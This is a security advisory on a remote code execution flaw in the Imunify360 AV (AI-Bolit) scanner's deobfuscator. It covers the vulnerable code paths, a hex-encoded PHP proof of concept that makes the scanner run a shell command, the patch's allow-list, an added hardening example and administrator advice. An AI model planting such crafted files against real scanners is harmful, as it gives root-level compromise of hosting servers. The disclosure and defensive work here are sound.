Recently a critical Remote Code Execution issue was patched in the Imunify360 AV product. Imunify360 serves up to 56 million websites. Hosting companies should patch the issue immediately.
Information about this vulnerability has been circulating since the end of October, so we also recommend that affected hosting companies check whether their servers have been compromised.
Unfortunately, Imunify360's team has released no statement about the issue, and no CVE has yet been assigned. At the same time, the issue has been publicly available on their Zendesk since November 4, 2025.
Based on our review of this vulnerability, we consider the CVSS score to be: 8.1 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C/CR:H/IR:H/AR:H).
Summary
A remote code execution vulnerability, reachable through the scanner's own malware deobfuscation, was recently discovered in imunify360AV (AI-bolit) versions prior to v32.7.4.0. The vulnerability stems from the deobfuscation logic executing untrusted functions and payloads extracted from attacker-supplied malware. An attacker-controlled payload can cause the deobfuscator to call dangerous PHP functions (for example system, exec, shell_exec, passthru, eval, etc.), resulting in arbitrary command execution and full compromise of the hosting environment.
A few other issues were patched. Here we describe one of the most critical.
Impact
Remote attackers can embed specially crafted obfuscated PHP that matches imunify360AV (AI-bolit) deobfuscation signatures. The deobfuscator will execute the extracted functions on attacker-controlled data, allowing execution of arbitrary system commands or arbitrary PHP code. Impact ranges from website compromise to full server takeover, depending on hosting configuration and privileges.
Detection is non-trivial because the malicious payloads are obfuscated (hex escapes, packed payloads, base64/gzinflate chains, custom delta/ord transformations) and are intended to be deobfuscated by the tool itself.
imunify360AV (Ai-Bolit) is a malware scanner specialized in website-related files such as PHP, JS and HTML. By default, the scanner is installed as a service and runs with root privileges.
Shared hosting escalation: On shared hosting, successful exploitation can lead to privilege escalation and root access, depending on how the scanner is deployed and which privileges it has. If imunify360AV or its wrapper runs with elevated privileges, an attacker could leverage the RCE to move from a single compromised site to complete host control.
Technical Details
imunify360AV (Ai-Bolit) includes heuristics and deobfuscators to try to convert obfuscated/malicious PHP into readable code. Two problematic flows were identified:
- Eval-hex function pattern: a signature that matches the following (simplified):
$data = "test";
$var1 = "\x73\x79\x73\x74\x65\x6d"; // "system"
$var2 = "\x74\x6f\x75\x63\x68..."; // arguments / command
$var3 = "\x70\x61\x63\x6b"; // "pack"
eval("$var3"($var2));
- Delta/Ord flow: deobfuscateDeltaOrd takes a string and a list of function names recovered from the obfuscated payload, then applies those functions in sequence using Helpers::executeWrapper.
Both flows rely on Helpers::executeWrapper, which wraps call_user_func_array inside a try/catch and returns the function result. There is no validation that the function being invoked is safe, so if the attacker supplies system, exec, shell_exec, eval, assert, etc., those functions are executed.
Conditions for exploitation
The exploit requires the imunify360AV scanner to perform active deobfuscation during analysis. In practice this means running the scanner with the -y / --deobfuscate option enabled. Example invocation used during triage:
php ai-bolit.php -y -j malware_exploit.php
Default behavior
By default, the imunify360AV (AI-bolit) PHP CLI appears to disable deep deobfuscation. The codebase contains a guard that keeps deobfuscation off unless it is explicitly enabled:
if (!defined('AI_DEOBFUSCATE')) {
    define('AI_DEOBFUSCATE', false);
}
[...]
if (isset($options['deobfuscate']) || isset($options['y'])) {
    define('AI_DEOBFUSCATE', true);
}
However, after checking how Imunify360 AV calls the scanner wrapper, we noticed the following:
./imav/malwarelib/scan/ai_bolit/scanner.py
def _cmd(
    self,
    filename,
    intensity_ram,
    progress_path,
    *,
    scan_type: str,
    # ... parameters ...
):
    cmd = [
        "/opt/ai-bolit/wrapper",
        AIBOLIT_PATH,
        "--smart",
        "--deobfuscate",  # ALWAYS ENABLED!
        "--avdb",
        MalwareSignatures.AI_BOLIT_HOSTER,
        "--no-html",
        "--memory",
        get_memory(intensity_ram),
        # ...
    ]
This means deobfuscation is always enabled, which makes the issue even more critical. The same command is used for all scan types:
- Background scans
- On-demand scans
- User-initiated scans
- Rapid account scans
Proof of Concept
<?php
$data = "test";
$payload = "\x73\x79\x73\x74\x65\x6d"("\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x6c\x33\x33\x74\x2e\x74\x78\x74\x20\x26\x26\x20\x65\x63\x68\x6f\x20\x22\x44\x45\x46\x2d\x33\x36\x37\x38\x39\x22\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x6c\x33\x33\x74\x2e\x74\x78\x74");
eval("\x70\x61\x63\x6b"($payload));
?>
Run the scanner on poc.php. This will create a file in the /tmp directory.
php ai-bolit.php -y -j poc.php
The Patch
The root cause is the execution of untrusted function names and payloads during deobfuscation. The correct fix is to never call untrusted functions extracted from arbitrary files. Instead, deobfuscation should be performed in a purely syntactic way (string unescaping, safe decoding) without executing recovered functions.
The patch adds validation before executing any discovered function. This validation whitelists only pure, deterministic decoding functions:
public static function isSafeFunc($func) {
    $safeFuncs = [
        'base64_decode','gzinflate','strrev','str_rot13','urldecode','substr','chr','ord',
    ];
    return in_array(strtolower($func), $safeFuncs, true);
}
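As an added example (not part of this advisory and not Imunify360/AI-Bolit code), the following PHP shows the hardened pattern the patch describes for both flows above: "\xNN" hex escapes are decoded purely syntactically, and every recovered function name is checked against the same allow-list before call_user_func_array is ever reached. The class and method names (SafeDeobfuscator, safeExecuteWrapper, hexUnescape, applyChain) are assumptions, the sample inputs are constructed, and the code needs PHP 8.0 or later.

```php
<?php
// Added example (hypothetical names, not AI-Bolit code): a deobfuscation
// helper that never executes a function it did not explicitly allow.
declare(strict_types=1);

final class SafeDeobfuscator
{
    /** Pure, deterministic decoders; the same set as the patch's isSafeFunc(). */
    private const SAFE_FUNCS = [
        'base64_decode', 'gzinflate', 'strrev', 'str_rot13', 'urldecode',
        'substr', 'chr', 'ord',
    ];

    public static function isSafeFunc(string $func): bool
    {
        return in_array(strtolower($func), self::SAFE_FUNCS, true);
    }

    /**
     * Replacement for an unrestricted call_user_func_array wrapper: a name
     * that is not on the allow-list is recorded in $rejected and NOT called.
     */
    public static function safeExecuteWrapper(string $func, array $args, array &$rejected): mixed
    {
        if (!self::isSafeFunc($func)) {
            $rejected[] = $func;   // e.g. "system", "eval", "assert": log/alert on this
            return null;
        }
        try {
            return call_user_func_array($func, $args);
        } catch (\Throwable $e) {
            return null;           // wrong arity, bad input, etc.
        }
    }

    /**
     * Syntactic decoding of PHP-style "\xNN" escapes. The function name hidden
     * in "\x73\x79\x73\x74\x65\x6d" is recovered as text only; nothing runs.
     */
    public static function hexUnescape(string $s): string
    {
        return preg_replace_callback(
            '/\\\\x([0-9A-Fa-f]{2})/',
            static fn(array $m): string => chr((int) hexdec($m[1])),
            $s
        );
    }

    /**
     * Applies a recovered function chain in sequence (as deobfuscateDeltaOrd
     * does), but through safeExecuteWrapper, so the chain stops at the first
     * disallowed or failing step instead of executing it.
     */
    public static function applyChain(string $data, array $funcs, array &$rejected): ?string
    {
        foreach ($funcs as $func) {
            $data = self::safeExecuteWrapper($func, [$data], $rejected);
            if ($data === null) {
                return null;
            }
        }
        return $data;
    }
}

$rejected = [];

// Constructed sample 1: the hex-escaped name from the eval-hex signature.
$name = SafeDeobfuscator::hexUnescape('\x73\x79\x73\x74\x65\x6d');
printf("recovered name: %s, allowed: %s\n", $name,
    var_export(SafeDeobfuscator::isSafeFunc($name), true));   // system, false

// Constructed sample 2: a benign chain, base64 then strrev, yields "test".
var_dump(SafeDeobfuscator::applyChain(base64_encode('tset'),
    ['base64_decode', 'strrev'], $rejected));                  // string(4) "test"

// Constructed sample 3: a chain whose last step is not a decoder; it is
// refused and recorded rather than executed.
var_dump(SafeDeobfuscator::applyChain(base64_encode('not-executed'),
    ['base64_decode', 'system'], $rejected));                  // NULL
printf("rejected: %s\n", implode(', ', $rejected));            // rejected: system
```

Run it with php on a file containing the block. The design choice worth noting is that a rejected name is not silently dropped: it is returned to the caller, so a scanner built this way can log or alert on a sample that tried to route execution through a non-decoder function.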
Vendor response and disclosure
At the time of publication, CloudLinux (the vendor behind Imunify360 and Ai-Bolit) has not issued a formal security advisory or coordinated disclosure through CVE channels. The only public mention of this issue appears in a short Zendesk article. A previous case in 2021 also exposed a critical remote code execution vulnerability within Imunify360, underscoring the need for stronger vendor transparency and proactive public advisories in future incidents.
Recommended actions for administrators
Immediate: If you run imunify360AV (AI-bolit) in any version prior to v32.7.4.0, apply the vendor-supplied security updates or remove the tool until it is patched.
If you cannot patch immediately: restrict the imunify360AV (AI-bolit) execution environment (run in an isolated analysis VM/container with no network/filesystem access and minimal privileges).
Administrators should also contact CloudLinux / Imunify360 support to report potential exposure and confirm whether their environment has been affected. The vendor can provide information on detection of exploitation attempts, updated signatures, and post-incident guidance. Collaborative verification with the vendor is critical to assess whether this issue has been exploited in the wild and to ensure that all affected installations receive the proper security updates.
Timeline